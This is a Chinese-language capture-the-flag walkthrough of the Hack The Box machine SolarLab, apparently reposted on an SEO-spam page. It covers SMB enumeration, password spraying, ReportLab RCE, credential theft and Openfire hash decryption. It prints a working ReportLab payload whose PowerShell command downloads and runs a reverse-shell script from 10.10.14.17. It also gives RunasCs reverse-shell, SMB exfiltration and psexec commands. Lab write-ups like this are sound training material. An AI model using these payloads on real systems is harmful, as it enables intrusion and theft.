当前位置: 首页 > wzjs >正文

用视频做网站背景百度一下你就知道了

wzjs 2025/7/21 11:16:16
用视频做网站背景,百度一下你就知道了,郑州汉狮哪家做网站好,wordpress怎么播放视频教程一、初步侦察与立足点获取 1.1 端口探测与服务识别 先进行端口探测,开放了 80、445、6791 等端口,其中 80 和 6791 都是 Web 服务,445 运行 smb 服务,是一台 Windows 服务器。其中 80 和 6791 分别重定向到 http://solarlab.htb…

在这里插入图片描述

一、初步侦察与立足点获取

1.1 端口探测与服务识别

先进行端口探测,开放了 80、445、6791 等端口,其中 806791 都是 Web 服务,445 运行 smb 服务,是一台 Windows 服务器。其中 806791 分别重定向到 http://solarlab.htbhttp://report.solarlab.htb:6791,添加到 dns 解析。

sudo nmap 10.10.11.16 -p- --min-rate=5000 -A

1.2 SMB 服务枚举与凭证发现

先枚举 smb 服务,分别尝试空会话认证和匿名登录,其中匿名登录成功获取到了共享目录。

# 空会话认证
nxc smb 10.10.11.16 --shares
# 匿名登录
nxc smb 10.10.11.16 -u '.' -p '' --shares

共享目录中有一个 Documents 目录比较特别,将所有的可读文件都下载下来。

nxc smb 10.10.11.16 -u '.' -p '' -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=10000000

打开下载的文件一一审查,发现其中一个 excel 表中存储有一些凭证信息,将这些凭证全都保存下来,分别存储为 users.txtpasswords.txt

Alexander.knight@gmail.com
KAlexander
Alexander.knight@gmail.com
blake.byte
AlexanderK
ClaudiaS

al;ksdhfewoiuh
dkjafblkjadsfgl
d398sadsknr390
ThisCanB3typedeasily1@
danenacia9234n
dadsfawe9dafkn

接着通过暴力破解 RID 枚举 Windows 用户,发现了 3 个本地用户,administratorblakeopenfire

nxc smb 10.10.11.16 -u '.' -p '' --rid-brute 10000

把这 3 个用户和上述密码进行喷洒,成功命中 blake:ThisCanB3typedeasily1@

nxc smb 10.10.11.16 -u local_users.txt -p passwords.txt --continue-on-success

1.3 Web 服务枚举 (solarlab.htb)

这台 Windows 没开启 rdp 和 winrm 等服务,没办法直接登录,先看 Web 服务的情况。简单浏览一下,发现 80 端口的是一个静态网站,其中有提到三个成员,能看到他们的开发 BLAKE BYTE 也是机器用户。

1.4 Web 服务枚举与登录 (report.solarlab.htb)

打开 6791 端口的网站是一个登录页面,尝试弱口令和 sql 注入未果。

使用 users.txtpasswords.txt 中的凭证进行登录框爆破,都没有成功,但是发现了返回信息泄露出存在的用户名,从结果来看,ClaudiaSAlexanderK 是存在的。

这两个用户名很明显就是 firstname 和 lastname 的结合,推测还有一个用户 BlakeB

BlakeB 添加到字典,成功爆破得到一组凭证 BlakeB:ThisCanB3typedeasily1@,blake 的密码其实还是和前面一样,只是用户名有变化。

1.5 利用 ReportLab RCE 获取初始访问权限 (blake)

登录网站,是一个提交审批的系统,其中有 4 个选项。

简单浏览了下,这 4 个都差不多,点开后都是一个富文本编辑器,提交信息并上传图片后会生成一个 PDF。

将 PDF 文件下载到本地,审计该文件的元数据,显示是用 ReportLab 创建的。

搜索该组件,存在 RCE 漏洞,无论如何,尝试利用一下。

根据漏洞描述,我们可以在生成 PDF 前插入 html 代码,并在其中植入命令,在 PDF 被生成时执行。

构造一个反弹 shell 的 payload,其中执行的 powershell 命令用 Windows 的 utf-16le 格式进行 base64 编码。

<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADEANwAvAHIAZQB2AC4AcABzADEAJwApAA==') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit
</font></para>

其原本的命令如下,远程加载并执行 nishang 的反弹 shell 脚本。

IEX(New-Object Net.Webclient).DownloadString('http://10.10.14.17/rev.ps1')

将该 payload 植入富文本编辑器,提交输入。测试发现文本框有输入字符上限,选择在其他字段植入。

命令执行成功,获得一个 shell。查看用户权限属于 blake,且没有可用作提权的特权。

二、权限提升与横向移动

2.1 blake 用户权限下的信息搜集 (users.db)

知道有 Web 服务,尝试寻找其配置文件是必须要做的事情。很容易就在项目目录中发现了一个 users.db 文件,将其传输到 kali 上。

# kali
impacket-smbserver -smb2support test .
# 目标Windows
Copy-Item -Path "C:\Users\blake\Documents\app\instance\users.db" -Destination "\\10.10.14.17\test\users.db"

users.db 中找到 3 组凭证,也就是审批系统的 3 个账号,将另外两个密码加入 passwords.txt

2.2 密码喷洒获取 openfire 用户凭证

进行新的一次密码喷洒,成功命中 openfire:HotP!fireguard

nxc smb 10.10.11.16 -u local_users.txt -p passwords.txt --continue-on-success

2.3 横向移动至 openfire 用户

既然有了 openfire 的密码,我们就先拿到它的权限再说。将 RunasCs 上传到目标机器上,输入 openfire 的凭证,反弹拿到一个新的 shell。

.\runascs.exe openfire HotP!fireguard powershell.exe -r 10.10.14.17:53 --bypass-uac

三、最终提权至 Administrator

3.1 openfire 用户权限下的信息搜集 (Openfire 服务)

openfire 也没看到有能直接利用的特权,用户目录中也没找到有用的信息。接下来枚举端口监听情况,看到有 5985 的 winrm 服务开启,但之前 nmap 没扫描出来,可能是防火墙拦截的原因。此外有大量端口开启,都是来自同一个进程。

netstat -ano

查看该进程情况,属于用户 openfire,进程名叫 openfire-service.exe

tasklist /v /fi "PID eq 3156"

这个进程并不是 administrator 启动的,用户 openfire 的权限我们已经有了,似乎去利用它价值不大。无论如何,先搜索看看这是个什么东西。

一番搜索发现,openfire 原来是一个开源的服务器,是有 Web 界面的。

针对这个服务,有两点思路:

  1. 将端口转发到本地,访问该服务器,或许可以从 Web 界面中找到一些敏感信息。
  2. 直接找这个项目的源码,尝试在其配置文件中找到凭证。

3.2 分析 Openfire 服务配置与数据库脚本

第二种方式简单些,那就先尝试找源码,很轻松就在 Program Files 目录下找到了 openfire 的源码。

在项目中翻找一番找到了一个 openfire.script 文件,似乎是用来创建数据库的脚本,里面写了 admin 用户的密码,不过是加密的。

3.3 解密 Openfire 管理员密码

搜索有没有解密的办法,很顺利就在 github 上找到了一个项目,需要提供密码哈希和密钥,正好这个脚本文件中都写着有。

输入 hash 和密钥,成功解密出密码 ThisPasswordShouldDo!@

java -jar OpenFire-1.0-SNAPSHOT-jar-with-dependencies.jar

3.4 利用解密密码获取 Administrator 权限

试试这个密码是否是 administrator 的密码,尝试 psexec 登录目标主机。结果很显然,成功获得 system 权限。

impacket-psexec administrator:'ThisPasswordShouldDo!@'@10.10.11.16

http://www.dtcms.com/wzjs/36192.html

相关文章:

  • 推广型网站如何建站泉州seo外包
  • 商城网站建设code521百度seo详解
  • 免费做网站通栏广告海南seo
  • 专业的个人网站建设哪家网站seo设置是什么意思
  • 指数 网站权重网站代运营价格
  • 温州企业网站建设公司南京seo排名收费
  • 关于域名和主机论坛的网站seo关键词推广公司
  • 宝塔搭建网站教程seo百度关键词优化软件
  • 企业建站的目的是什么宣传推广策略
  • 批发网站建设什么是网络营销渠道
  • 农村电商平台怎么加入外包seo服务口碑好
  • 深圳高端网站奶糖 seo 博客
  • 网站建设包含哪些百度app下载官方
  • 衢州网站开发网站排名查询alexa
  • wordpress建立php站点地图必应搜索引擎首页
  • 实时爬虫网站是怎么做的sem是什么的缩写
  • 免费建造网站国外网站排行
  • 长沙网站建设开发搜索引擎营销的方式
  • wordpress 文件上传限制李江seo
  • 河源市住房城乡和建设局网站刚开的店铺怎么做推广
  • 可以做哪些有趣的网站东莞服务好的营销型网站建设
  • thinkphp做直播网站常见的系统优化软件
  • 北京朝阳住房建设委员会网站全网整合营销推广方案
  • jsp怎么做动态网站seo基础
  • 阜宁做网站的价格今日疫情最新消息全国31个省
  • 做网站编辑累吗合肥网站seo推广
  • 自己做网站的成本电商网站开发平台
  • 老网站删除做新站会影响收录吗国内新闻最新消息今天简短
  • 网站被k怎么查老鬼seo
  • wordpress cdc网站优化教程